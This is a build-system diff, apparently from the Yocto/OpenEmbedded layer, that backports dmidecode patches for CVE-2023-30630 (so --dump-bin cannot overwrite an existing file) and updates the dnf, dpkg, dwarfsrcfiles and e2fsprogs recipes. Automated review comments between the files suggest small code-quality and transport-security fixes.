117+ len = DWORD(buf + 0x0C);
118+ table = dmi_table_get(((off_t)offset.h << 32) | offset.l, &len, 0, ver,
119+ devmem, flags | FLAG_STOP_AT_EOT);
120+ if (table == NULL)
121+ return 1;
122
123 if (opt.flags & FLAG_DUMP_BIN)
124 {
125@@ -5351,18 +5351,28 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
126 memcpy(crafted, buf, 32);
127 overwrite_smbios3_address(crafted);
128
129+ dmi_table_dump(table, len);
130 if (!(opt.flags & FLAG_QUIET))
131 printf("# Writing %d bytes to %s.\n", crafted[0x06],
132 opt.dumpfile);
133 write_dump(0, crafted[0x06], crafted, opt.dumpfile, 1);
134 }
135+ else
136+ {
137+ dmi_table_decode(table, len, 0, ver >> 8,
138+ flags | FLAG_STOP_AT_EOT);
139+ }
140+
141+ free(table);
142
143 return 1;
144 }
145
146 static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
147 {
148- u16 ver;
149+ u16 ver, num;
150+ u32 len;
151+ u8 *table;
152
153 /* Don't let checksum run beyond the buffer */
154 if (buf[0x05] > 0x20)
155@@ -5402,8 +5412,13 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
156 printf("SMBIOS %u.%u present.\n",
157 ver >> 8, ver & 0xFF);
158
159- dmi_table(DWORD(buf + 0x18), WORD(buf + 0x16), WORD(buf + 0x1C),
160- ver << 8, devmem, flags);
161+ /* Maximum length, may get trimmed */
162+ len = WORD(buf + 0x16);
163+ num = WORD(buf + 0x1C);
164+ table = dmi_table_get(DWORD(buf + 0x18), &len, num, ver << 8,
165+ devmem, flags);
166+ if (table == NULL)
167+ return 1;
168
169 if (opt.flags & FLAG_DUMP_BIN)
170 {
171@@ -5412,27 +5427,43 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
172 memcpy(crafted, buf, 32);
173 overwrite_dmi_address(crafted + 0x10);
174
175+ dmi_table_dump(table, len);
176 if (!(opt.flags & FLAG_QUIET))
177 printf("# Writing %d bytes to %s.\n", crafted[0x05],
178 opt.dumpfile);
179 write_dump(0, crafted[0x05], crafted, opt.dumpfile, 1);
180 }
181+ else
182+ {
183+ dmi_table_decode(table, len, num, ver, flags);
184+ }
185+
186+ free(table);
187
188 return 1;
189 }
190
191 static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
192 {
193+ u16 ver, num;
194+ u32 len;
195+ u8 *table;
196+
197 if (!checksum(buf, 0x0F))
198 return 0;
199
200+ ver = ((buf[0x0E] & 0xF0) << 4) + (buf[0x0E] & 0x0F);
201 if (!(opt.flags & FLAG_QUIET))
202 printf("Legacy DMI %u.%u present.\n",
203 buf[0x0E] >> 4, buf[0x0E] & 0x0F);
204
205- dmi_table(DWORD(buf + 0x08), WORD(buf + 0x06), WORD(buf + 0x0C),
206- ((buf[0x0E] & 0xF0) << 12) + ((buf[0x0E] & 0x0F) << 8),
207- devmem, flags);
208+ /* Maximum length, may get trimmed */
209+ len = WORD(buf + 0x06);
210+ num = WORD(buf + 0x0C);
211+ table = dmi_table_get(DWORD(buf + 0x08), &len, num, ver << 8,
212+ devmem, flags);
213+ if (table == NULL)
214+ return 1;
215
216 if (opt.flags & FLAG_DUMP_BIN)
217 {
218@@ -5441,11 +5472,18 @@ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
219 memcpy(crafted, buf, 16);
220 overwrite_dmi_address(crafted);
221
222+ dmi_table_dump(table, len);
223 if (!(opt.flags & FLAG_QUIET))
224 printf("# Writing %d bytes to %s.\n", 0x0F,
225 opt.dumpfile);
226 write_dump(0, 0x0F, crafted, opt.dumpfile, 1);
227 }
228+ else
229+ {
230+ dmi_table_decode(table, len, num, ver, flags);
231+ }
232+
233+ free(table);
234
235 return 1;
236 }
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch
new file mode 100644
index 0000000000..353c2553f5
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch
@@ -0,0 +1,198 @@
1From 58e8a07b1aef0e53af1642b30248255e53e42790 Mon Sep 17 00:00:00 2001
2From: Jean Delvare <jdelvare@suse.de>
3Date: Mon, 20 Feb 2023 14:53:25 +0100
4Subject: [PATCH] dmidecode: Write the whole dump file at once
5
6When option --dump-bin is used, write the whole dump file at once,
7instead of opening and closing the file separately for the table
8and then for the entry point.
9
10As the file writing function is no longer generic, it gets moved
11from util.c to dmidecode.c.
12
13One minor functional change resulting from the new implementation is
14that the entry point is written first now, so the messages printed
15are swapped.
16
17CVE: CVE-2023-30630
18Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=d8cfbc808f38]
19
20Backport Changes:
21- In the file dmidecode.c, the commit [2241f1d] in v3.3 introduces
22 pr_info(). This is backported to printf() as per v3.2.
23
24Signed-off-by: Jean Delvare <jdelvare@suse.de>
25Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
26(cherry picked from commit d8cfbc808f387e87091c25e7d5b8c2bb348bb206)
27Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
28
29---
30 dmidecode.c | 69 +++++++++++++++++++++++++++++++++++++++--------------
31 util.c | 40 -------------------------------
32 util.h | 1 -
33 3 files changed, 51 insertions(+), 59 deletions(-)
34
35diff --git a/dmidecode.c b/dmidecode.c
36index d6eedd1..b91e53b 100644
37--- a/dmidecode.c
38+++ b/dmidecode.c
39@@ -5094,11 +5094,56 @@ static void dmi_table_string(const struct dmi_header *h, const u8 *data, u16 ver
40 }
41 }
42
43-static void dmi_table_dump(const u8 *buf, u32 len)
44+static int dmi_table_dump(const u8 *ep, u32 ep_len, const u8 *table,
45+ u32 table_len)
46 {
47+ FILE *f;
48+
49+ f = fopen(opt.dumpfile, "wb");
50+ if (!f)
51+ {
52+ fprintf(stderr, "%s: ", opt.dumpfile);
53+ perror("fopen");
54+ return -1;
55+ }
56+
57+ if (!(opt.flags & FLAG_QUIET))
58+ printf("# Writing %d bytes to %s.\n", ep_len, opt.dumpfile);
59+ if (fwrite(ep, ep_len, 1, f) != 1)
60+ {
61+ fprintf(stderr, "%s: ", opt.dumpfile);
62+ perror("fwrite");
63+ goto err_close;
64+ }
65+
66+ if (fseek(f, 32, SEEK_SET) != 0)
67+ {
68+ fprintf(stderr, "%s: ", opt.dumpfile);
69+ perror("fseek");
70+ goto err_close;
71+ }
72+
73 if (!(opt.flags & FLAG_QUIET))
74- printf("# Writing %d bytes to %s.\n", len, opt.dumpfile);
75- write_dump(32, len, buf, opt.dumpfile, 0);
76+ printf("# Writing %d bytes to %s.\n", table_len, opt.dumpfile);
77+ if (fwrite(table, table_len, 1, f) != 1)
78+ {
79+ fprintf(stderr, "%s: ", opt.dumpfile);
80+ perror("fwrite");
81+ goto err_close;
82+ }
83+
84+ if (fclose(f))
85+ {
86+ fprintf(stderr, "%s: ", opt.dumpfile);
87+ perror("fclose");
88+ return -1;
89+ }
90+
91+ return 0;
92+
93+err_close:
94+ fclose(f);
95+ return -1;
96 }
97
98 static void dmi_table_decode(u8 *buf, u32 len, u16 num, u16 ver, u32 flags)
99@@ -5351,11 +5396,7 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
100 memcpy(crafted, buf, 32);
101 overwrite_smbios3_address(crafted);
102
103- dmi_table_dump(table, len);
104- if (!(opt.flags & FLAG_QUIET))
105- printf("# Writing %d bytes to %s.\n", crafted[0x06],
106- opt.dumpfile);
107- write_dump(0, crafted[0x06], crafted, opt.dumpfile, 1);
108+ dmi_table_dump(crafted, crafted[0x06], table, len);
109 }
110 else
111 {
112@@ -5427,11 +5468,7 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
113 memcpy(crafted, buf, 32);
114 overwrite_dmi_address(crafted + 0x10);
115
116- dmi_table_dump(table, len);
117- if (!(opt.flags & FLAG_QUIET))
118- printf("# Writing %d bytes to %s.\n", crafted[0x05],
119- opt.dumpfile);
120- write_dump(0, crafted[0x05], crafted, opt.dumpfile, 1);
121+ dmi_table_dump(crafted, crafted[0x05], table, len);
122 }
123 else
124 {
125@@ -5472,11 +5509,7 @@ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
126 memcpy(crafted, buf, 16);
127 overwrite_dmi_address(crafted);
128
129- dmi_table_dump(table, len);
130- if (!(opt.flags & FLAG_QUIET))
131- printf("# Writing %d bytes to %s.\n", 0x0F,
132- opt.dumpfile);
133- write_dump(0, 0x0F, crafted, opt.dumpfile, 1);
134+ dmi_table_dump(crafted, 0x0F, table, len);
135 }
136 else
137 {
138diff --git a/util.c b/util.c
139index eeffdae..2e1931c 100644
140--- a/util.c
141+++ b/util.c
142@@ -247,46 +247,6 @@ out:
143 return p;
144 }
145
146-int write_dump(size_t base, size_t len, const void *data, const char *dumpfile, int add)
147-{
148- FILE *f;
149-
150- f = fopen(dumpfile, add ? "r+b" : "wb");
151- if (!f)
152- {
153- fprintf(stderr, "%s: ", dumpfile);
154- perror("fopen");
155- return -1;
156- }
157-
158- if (fseek(f, base, SEEK_SET) != 0)
159- {
160- fprintf(stderr, "%s: ", dumpfile);
161- perror("fseek");
162- goto err_close;
163- }
164-
165- if (fwrite(data, len, 1, f) != 1)
166- {
167- fprintf(stderr, "%s: ", dumpfile);
168- perror("fwrite");
169- goto err_close;
170- }
171-
172- if (fclose(f))
173- {
174- fprintf(stderr, "%s: ", dumpfile);
175- perror("fclose");
176- return -1;
177- }
178-
179- return 0;
180-
181-err_close:
182- fclose(f);
183- return -1;
184-}
185-
186 /* Returns end - start + 1, assuming start < end */
187 u64 u64_range(u64 start, u64 end)
188 {
189diff --git a/util.h b/util.h
190index 3094cf8..ef24eb9 100644
191--- a/util.h
192+++ b/util.h
193@@ -27,5 +27,4 @@
194 int checksum(const u8 *buf, size_t len);
195 void *read_file(off_t base, size_t *len, const char *filename);
196 void *mem_chunk(off_t base, size_t len, const char *devmem);
197-int write_dump(size_t base, size_t len, const void *data, const char *dumpfile, int add);
198 u64 u64_range(u64 start, u64 end);
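Review bot: The rewritten `dmi_table_dump()` returns -1 on every failure path, but the three new call sites in smbios3_decode, smbios_decode and legacy_decode invoke it as a bare statement, e.g. `dmi_table_dump(crafted, crafted[0x06], table, len);`, and then fall through to `return 1`. A failed `--dump-bin` is therefore reported only on stderr; how main() turns that return into an exit status is outside this patch, but nothing here lets it see the failure. Capturing the result at each call site and passing it up would let scripts detect a missing or partial dump. The two new messages also print the `u32` lengths with `%d`; `%u` matches the type, as in `printf("# Writing %u bytes to %s.\n", table_len, opt.dumpfile);`.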
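diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch
new file mode 100644
index 0000000000..bf4d060c8c
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch
@@ -0,0 +1,62 @@
+From b7dacccff32294ea522df32a9391d0218e7600ea Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Mon, 20 Feb 2023 14:53:31 +0100
+Subject: [PATCH] dmidecode: Do not let --dump-bin overwrite an existing file
+
+Make sure that the file passed to option --dump-bin does not already
+exist. In practice, it is rather unlikely that an honest user would
+want to overwrite an existing dump file, while this possibility
+could be used by a rogue user to corrupt a system file.
+
+CVE: CVE-2023-30630
+Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=6ca381c1247c]
+
+Backport Changes:
+- Ignored changes in man/dmidecode.8 file.
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
+(cherry picked from commit 6ca381c1247c81f74e1ca4e7706f70bdda72e6f2)
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+
+---
+ dmidecode.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/dmidecode.c b/dmidecode.c
+index b91e53b..846d9a1 100644
+--- a/dmidecode.c
++++ b/dmidecode.c
+@@ -60,6 +60,7 @@
+ * https://www.dmtf.org/sites/default/files/DSP0270_1.0.1.pdf
+ */
+
++#include <fcntl.h>
+ #include <stdio.h>
+ #include <string.h>
+ #include <strings.h>
+@@ -5097,13 +5098,22 @@ static void dmi_table_string(const struct dmi_header *h, const u8 *data, u16 ver
+ static int dmi_table_dump(const u8 *ep, u32 ep_len, const u8 *table,
+ u32 table_len)
+ {
++ int fd;
+ FILE *f;
+
+- f = fopen(opt.dumpfile, "wb");
++ fd = open(opt.dumpfile, O_WRONLY|O_CREAT|O_EXCL, 0666);
++ if (fd == -1)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("open");
++ return -1;
++ }
++
++ f = fdopen(fd, "wb");
+ if (!f)
+ {
+ fprintf(stderr, "%s: ", opt.dumpfile);
+- perror("fopen");
++ perror("fdopen");
+ return -1;
+ }
+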
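Review bot: The `fdopen()` failure branch in dmi_table_dump returns -1 without closing `fd`, so the descriptor from `open()` leaks and the empty file just created with `O_CREAT|O_EXCL` is left behind; adding `close(fd);` before that `return -1;` would tidy the path. A short comment above the `open()` call, such as `/* O_EXCL: fail if the dump path already exists, including when it is a symlink */`, would record why `fopen()` was replaced. The function body continues past the end of the hunk, so the later write and close paths are not visible here.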
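diff --git a/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb b/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
index 63f4061cb7..1e7c38dc8a 100644
--- a/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
+++ b/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
@@ -1,10 +1,14 @@
 SUMMARY = "DMI (Desktop Management Interface) table related utilities"
 HOMEPAGE = "http://www.nongnu.org/dmidecode/"
+DESCRIPTION = "Dmidecode reports information about your system's hardware as described in your system BIOS according to the SMBIOS/DMI standard (see a sample output)."
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 
 SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/dmidecode/${BP}.tar.xz \
  file://0001-Committing-changes-from-do_unpack_extra.patch \
+ file://CVE-2023-30630-dependent_p1.patch \
+ file://CVE-2023-30630-dependent_p2.patch \
+ file://CVE-2023-30630.patch \
  "
 
 COMPATIBLE_HOST = "(i.86|x86_64|aarch64|arm|powerpc|powerpc64).*-linux"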
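diff --git a/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch b/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch
new file mode 100644
index 0000000000..57c2375a54
--- /dev/null
+++ b/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch
@@ -0,0 +1,60 @@
+From c88a77198c0156e425c2725f30e481207de5162f Mon Sep 17 00:00:00 2001
+From: Jaroslav Mracek <jmracek@redhat.com>
+Date: Tue, 3 Sep 2019 11:01:51 +0200
+Subject: [PATCH] Keep installed packages in upgrade job
+ (RhBug:1728252,1644241,1741381)
+
+In combination with marking of job as TARGETED it prevents from
+reinstalling of modified packages with same NEVRA.
+
+https://bugzilla.redhat.com/show_bug.cgi?id=1728252
+https://bugzilla.redhat.com/show_bug.cgi?id=1644241
+https://bugzilla.redhat.com/show_bug.cgi?id=1741381
+
+Closes: #1474
+Approved by: m-blaha
+
+
+Backport to fix bug in dnf in oe-core
+from https://github.com/rpm-software-management/dnf
+
+Removed spec file portion of patch
+
+Upstream-Status: Backport
+Signed-off-by: Jate Sujjavanich <jatedev@gmail.com>
+---
+ dnf.spec | 4 ++--
+ dnf/base.py | 3 ---
+ dnf/module/module_base.py | 2 +-
+ 3 files changed, 3 insertions(+), 6 deletions(-)
+
+diff --git a/dnf/base.py b/dnf/base.py
+index b2ced61..628c154 100644
+--- a/dnf/base.py
++++ b/dnf/base.py
+@@ -1968,9 +1968,6 @@ class Base(object):
+ obsoletes=q.installed().union(q.upgrades()))
+ # add obsoletes into transaction
+ q = q.union(obsoletes)
+- # provide only available packages to solver otherwise selection of available
+- # possibilities will be ignored
+- q = q.available()
+ if reponame is not None:
+ q.filterm(reponame=reponame)
+ q = self._merge_update_filters(q, pkg_spec=pkg_spec)
+diff --git a/dnf/module/module_base.py b/dnf/module/module_base.py
+index 976d730..ce70f63 100644
+--- a/dnf/module/module_base.py
++++ b/dnf/module/module_base.py
+@@ -214,7 +214,7 @@ class ModuleBase(object):
+
+ if not upgrade_package_set:
+ logger.error(_("Unable to match profile in argument {}").format(spec))
+- query = self.base.sack.query().available().filterm(name=upgrade_package_set)
++ query = self.base.sack.query().filterm(name=upgrade_package_set)
+ if query:
+ sltr = dnf.selector.Selector(self.base.sack)
+ sltr.set(pkg=query)
+--
+2.7.4
+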
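Review bot: `Upstream-Status: Backport` in this patch header names only the upstream repository, not the commit being backported, so the origin of the change cannot be checked from the file itself. The other backports in this change cite the commit in brackets, and the same form would fit here: `Upstream-Status: Backport [https://github.com/rpm-software-management/dnf/commit/<COMMIT_ID>]` with the real id filled in. The diffstat still lists `dnf.spec` although the header says that portion was removed; trimming that line would stop readers looking for a missing hunk. Both Python hunks sit inside methods that start and end outside the hunk.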
diff --git a/meta/recipes-devtools/dnf/dnf_4.2.2.bb b/meta/recipes-devtools/dnf/dnf_4.2.2.bb
index a046ffc05d..6b6b233d6d 100644
--- a/meta/recipes-devtools/dnf/dnf_4.2.2.bb
+++ b/meta/recipes-devtools/dnf/dnf_4.2.2.bb
@@ -2,12 +2,13 @@ SUMMARY = "Package manager forked from Yum, using libsolv as a dependency resolv
2DESCRIPTION = "Software package manager that installs, updates, and removes \ 2DESCRIPTION = "Software package manager that installs, updates, and removes \
3packages on RPM-based Linux distributions. It automatically computes \ 3packages on RPM-based Linux distributions. It automatically computes \
4dependencies and determines the actions required to install packages." 4dependencies and determines the actions required to install packages."
5HOMEPAGE = "https://github.com/rpm-software-management/dnf"
5LICENSE = "GPLv2" 6LICENSE = "GPLv2"
6LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ 7LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
7 file://PACKAGE-LICENSING;md5=4a0548e303dbc77f067335b4d688e745 \ 8 file://PACKAGE-LICENSING;md5=4a0548e303dbc77f067335b4d688e745 \
8 " 9 "
9 10
10SRC_URI = "git://github.com/rpm-software-management/dnf.git \ 11SRC_URI = "git://github.com/rpm-software-management/dnf.git;branch=master;protocol=https \
11 file://0001-Corretly-install-tmpfiles.d-configuration.patch \ 12 file://0001-Corretly-install-tmpfiles.d-configuration.patch \
12 file://0001-Do-not-hardcode-etc-and-systemd-unit-directories.patch \ 13 file://0001-Do-not-hardcode-etc-and-systemd-unit-directories.patch \
13 file://0005-Do-not-prepend-installroot-to-logdir.patch \ 14 file://0005-Do-not-prepend-installroot-to-logdir.patch \
@@ -15,6 +16,7 @@ SRC_URI = "git://github.com/rpm-software-management/dnf.git \
15 file://0030-Run-python-scripts-using-env.patch \ 16 file://0030-Run-python-scripts-using-env.patch \
16 file://Fix-SyntaxWarning.patch \ 17 file://Fix-SyntaxWarning.patch \
17 file://0001-set-python-path-for-completion_helper.patch \ 18 file://0001-set-python-path-for-completion_helper.patch \
19 file://0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch \
18 " 20 "
19 21
20SRCREV = "9947306a55271b8b7c9e2b6e3b7d582885b6045d" 22SRCREV = "9947306a55271b8b7c9e2b6e3b7d582885b6045d"
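diff --git a/meta/recipes-devtools/dpkg/dpkg.inc b/meta/recipes-devtools/dpkg/dpkg.inc
index 1c3c585d79..f008959d77 100644
--- a/meta/recipes-devtools/dpkg/dpkg.inc
+++ b/meta/recipes-devtools/dpkg/dpkg.inc
@@ -1,5 +1,7 @@
 SUMMARY = "Package maintenance system from Debian"
 LICENSE = "GPLv2.0+"
+HOMEPAGE = "https://salsa.debian.org/dpkg-team/dpkg"
+DESCRIPTION = "The primary interface for the dpkg suite is the dselect program. A more low-level and less user-friendly interface is available in the form of the dpkg command."
 SECTION = "base"
 
 DEPENDS = "zlib bzip2 perl ncurses"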
diff --git a/meta/recipes-devtools/dpkg/dpkg_1.19.7.bb b/meta/recipes-devtools/dpkg/dpkg_1.19.8.bb
index e9dec337b3..9e6e9f2464 100644
--- a/meta/recipes-devtools/dpkg/dpkg_1.19.7.bb
+++ b/meta/recipes-devtools/dpkg/dpkg_1.19.8.bb
@@ -18,5 +18,5 @@ SRC_URI_append_class-native = " \
18 file://tweak-options-require-tar-1.27.patch \ 18 file://tweak-options-require-tar-1.27.patch \
19" 19"
20 20
21SRC_URI[md5sum] = "60f57c5494e6dfa177504d47bfa0e383" 21SRC_URI[md5sum] = "9d170c8baa1aa36b09698c909f304508"
22SRC_URI[sha256sum] = "4c27fededf620c0aa522fff1a48577ba08144445341257502e7730f2b1a296e8" 22SRC_URI[sha256sum] = "2632c00b0cf0ea19ed7bd6700e6ec5faca93f0045af629d356dc03ad74ae6f10"
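diff --git a/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb b/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
index 2c843a9342..56b52d6a47 100644
--- a/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
+++ b/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
@@ -1,4 +1,5 @@
 SUMMARY = "A small utility for printing debug source file locations embedded in binaries"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://../dwarfsrcfiles.c;md5=31483894e453a77acbb67847565f1b5c;beginline=1;endline=8"
 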
diff --git a/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c b/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
index af7af524eb..9eb5ca807a 100644
--- a/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
+++ b/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
@@ -9,6 +9,7 @@
9 9
10#include <argp.h> 10#include <argp.h>
11#include <stdio.h> 11#include <stdio.h>
12#include <stdlib.h>
12 13
13#include <dwarf.h> 14#include <dwarf.h>
14#include <elfutils/libdw.h> 15#include <elfutils/libdw.h>
@@ -83,13 +84,15 @@ process_cu (Dwarf_Die *cu_die)
83int 84int
84main (int argc, char **argv) 85main (int argc, char **argv)
85{ 86{
86 char* args[3]; 87 char* args[5];
87 int res = 0; 88 int res = 0;
88 Dwfl *dwfl; 89 Dwfl *dwfl;
89 Dwarf_Addr bias; 90 Dwarf_Addr bias;
90 91
91 if (argc != 2) 92 if (argc != 2) {
92 fprintf(stderr, "Usage %s <file>", argv[0]); 93 fprintf(stderr, "Usage %s <file>", argv[0]);
94 exit(EXIT_FAILURE);
95 }
93 96
94 // Pretend "dwarfsrcfiles -e <file>" was given, so we can use standard 97 // Pretend "dwarfsrcfiles -e <file>" was given, so we can use standard
95 // dwfl argp parser to open the file for us and get our Dwfl. Useful 98 // dwfl argp parser to open the file for us and get our Dwfl. Useful
@@ -98,8 +101,12 @@ main (int argc, char **argv)
98 args[0] = argv[0]; 101 args[0] = argv[0];
99 args[1] = "-e"; 102 args[1] = "-e";
100 args[2] = argv[1]; 103 args[2] = argv[1];
104 // We don't want to follow debug linked files due to the way OE processes
105 // files, could race against changes in the linked binary (e.g. objcopy on it)
106 args[3] = "--debuginfo-path";
107 args[4] = "/not/exist";
101 108
102 argp_parse (dwfl_standard_argp (), 3, args, 0, NULL, &dwfl); 109 argp_parse (dwfl_standard_argp (), 5, args, 0, NULL, &dwfl);
103 110
104 Dwarf_Die *cu = NULL; 111 Dwarf_Die *cu = NULL;
105 while ((cu = dwfl_nextcu (dwfl, cu, &bias)) != NULL) 112 while ((cu = dwfl_nextcu (dwfl, cu, &bias)) != NULL)
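Review bot: The argument count passed to `argp_parse` is a second hard-coded `5` that has to be kept in step with `char* args[5]`; deriving it, `argp_parse (dwfl_standard_argp (), sizeof args / sizeof args[0], args, 0, NULL, &dwfl);`, removes the chance of the two drifting apart the next time an option is appended. The usage message printed before the new `exit(EXIT_FAILURE)` still lacks a trailing newline: `fprintf(stderr, "Usage %s <file>\n", argv[0]);`. The comment above `--debuginfo-path` could also say that `/not/exist` is meant to be a directory that is absent on the build host, since the intended effect presumably depends on nothing being found there. main continues past the end of the last hunk.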
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc b/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
index 009f5ed807..57e4665a34 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
@@ -3,7 +3,7 @@ DESCRIPTION = "The Ext2 Filesystem Utilities (e2fsprogs) contain all of the stan
3fixing, configuring , and debugging ext2 filesystems." 3fixing, configuring , and debugging ext2 filesystems."
4HOMEPAGE = "http://e2fsprogs.sourceforge.net/" 4HOMEPAGE = "http://e2fsprogs.sourceforge.net/"
5 5
6LICENSE = "GPLv2 & LGPLv2 & BSD & MIT" 6LICENSE = "GPLv2 & LGPLv2 & BSD-3-Clause & MIT"
7LICENSE_e2fsprogs-dumpe2fs = "GPLv2" 7LICENSE_e2fsprogs-dumpe2fs = "GPLv2"
8LICENSE_e2fsprogs-e2fsck = "GPLv2" 8LICENSE_e2fsprogs-e2fsck = "GPLv2"
9LICENSE_e2fsprogs-mke2fs = "GPLv2" 9LICENSE_e2fsprogs-mke2fs = "GPLv2"
@@ -19,7 +19,7 @@ LIC_FILES_CHKSUM = "file://NOTICE;md5=d50be0580c0b0a7fbc7a4830bbe6c12b \
19SECTION = "base" 19SECTION = "base"
20DEPENDS = "util-linux attr" 20DEPENDS = "util-linux attr"
21 21
22SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git" 22SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git;branch=master"
23S = "${WORKDIR}/git" 23S = "${WORKDIR}/git"
24 24
25inherit autotools gettext texinfo pkgconfig multilib_header update-alternatives ptest 25inherit autotools gettext texinfo pkgconfig multilib_header update-alternatives ptest
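Review bot: The updated `SRC_URI` adds `;branch=master` but still fetches over the unauthenticated `git://` transport, whereas the dnf recipe touched by this same change was moved to `;protocol=https`. The SRCREV in the versioned recipe pins the commit, which limits what a tampered transfer could substitute, but `SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git;branch=master;protocol=https"` would add transport authentication and keep the two recipes consistent.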
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch
deleted file mode 100644
index ba4e3a3c97..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch
+++ /dev/null
@@ -1,49 +0,0 @@
1From 71ba13755337e19c9a826dfc874562a36e1b24d3 Mon Sep 17 00:00:00 2001
2From: Theodore Ts'o <tytso@mit.edu>
3Date: Thu, 19 Dec 2019 19:45:06 -0500
4Subject: [PATCH] e2fsck: don't try to rehash a deleted directory
5
6If directory has been deleted in pass1[bcd] processing, then we
7shouldn't try to rehash the directory in pass 3a when we try to
8rehash/reoptimize directories.
9
10Signed-off-by: Theodore Ts'o <tytso@mit.edu>
11
12Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=71ba13755337e19c9a826dfc874562a36e1b24d3]
13Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
14---
15 e2fsck/pass1b.c | 4 ++++
16 e2fsck/rehash.c | 2 ++
17 2 files changed, 6 insertions(+)
18
19diff --git a/e2fsck/pass1b.c b/e2fsck/pass1b.c
20index 5693b9cf..bca701ca 100644
21--- a/e2fsck/pass1b.c
22+++ b/e2fsck/pass1b.c
23@@ -705,6 +705,10 @@ static void delete_file(e2fsck_t ctx, ext2_ino_t ino,
24 fix_problem(ctx, PR_1B_BLOCK_ITERATE, &pctx);
25 if (ctx->inode_bad_map)
26 ext2fs_unmark_inode_bitmap2(ctx->inode_bad_map, ino);
27+ if (ctx->inode_reg_map)
28+ ext2fs_unmark_inode_bitmap2(ctx->inode_reg_map, ino);
29+ ext2fs_unmark_inode_bitmap2(ctx->inode_dir_map, ino);
30+ ext2fs_unmark_inode_bitmap2(ctx->inode_used_map, ino);
31 ext2fs_inode_alloc_stats2(fs, ino, -1, LINUX_S_ISDIR(dp->inode.i_mode));
32 quota_data_sub(ctx->qctx, &dp->inode, ino,
33 pb.dup_blocks * fs->blocksize);
34diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
35index 3dd1e941..2c908be0 100644
36--- a/e2fsck/rehash.c
37+++ b/e2fsck/rehash.c
38@@ -1028,6 +1028,8 @@ void e2fsck_rehash_directories(e2fsck_t ctx)
39 if (!ext2fs_u32_list_iterate(iter, &ino))
40 break;
41 }
42+ if (!ext2fs_test_inode_bitmap2(ctx->inode_dir_map, ino))
43+ continue;
44
45 pctx.dir = ino;
46 if (first) {
47--
482.24.1
49
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch
deleted file mode 100644
